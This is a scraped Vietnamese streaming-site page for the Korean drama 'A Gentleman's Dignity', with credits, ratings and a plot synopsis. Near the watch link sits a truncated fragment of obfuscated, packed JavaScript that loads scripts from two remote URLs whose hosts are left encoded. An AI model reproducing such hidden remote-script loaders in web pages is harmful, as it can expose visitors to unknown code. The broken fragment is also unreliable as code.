Banner C1

Phim

Phẩm Giá Quý Ông - A Gentlemans Dignity

Xem Phim Phẩm Giá Quý Ông
483368 lượt xem

20/20 Phim Tình CảmPhim Hài Hước Phim Hàn Quốc

Đạo Diễn: Shin Woo Chul , Kwon Hyuk Chan

Thời lượng: 20 Tập

Năm phát hành: 2012

Xem phimXem TrailerTải Phim

4.5
236 Star | 52 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Phim Phẩm Giá Quý Ông todaytv trọn bộ : nói về một nhóm bạn thân gồm 4 người đàn ông điều ở tuổi trung niên nhưng họ gặp khó khăn trong tình trường mặc dù sự nghiệp rất thành công. Kim Don Jin là một viện trưởng của viện kiến trúc, thành đạt, hấp dẫn với phụ nữ nhưng lời lẽ có phần cay độc. Sở dĩ anh không không chịu kết hôn vì không muốn chia những thứ mà mình đang có cho vợ con. Cho tới khi anh gặp Song Ye Soo - một cô giáo làm thêm bằng nghề trọng tài bóng chày. Ban đầu anh biết Ye Soo yêu đơn phương bạn mình là Im Tae San nên có ý châm chọc nhưng sau đó chính anh cũng rơi vào lưới tình với Ye Soo.
Phẩm Giá Quý Ông
Phim Phẩm Giá Quý Ông còn có anh chàng luật sư Choi  Yoon luôn sống với mối tình của người vợ quá cố 7 năm qua của mình mà thờ ơ với tình cảm của Im Mae Ri - em gái Tae San. Còn Ko Young Do mặc dù đã có vợ rất giàu có nhưng vẫn thích trăng hoa với các cô gái khác nên bị vợ đệ đơn ly hôn. Còn anh chàng Im Tae San thì đang có mối tình đẹp nhưng cũng mệt mỏi với Hong Se Ra bạn của Ye Soo.
Phẩm Giá Quý Ông

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
  • Trailer Phim
9
52
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Phẩm Giá Quý Ông

Banner C1

User Online
Banner C1
Banner C1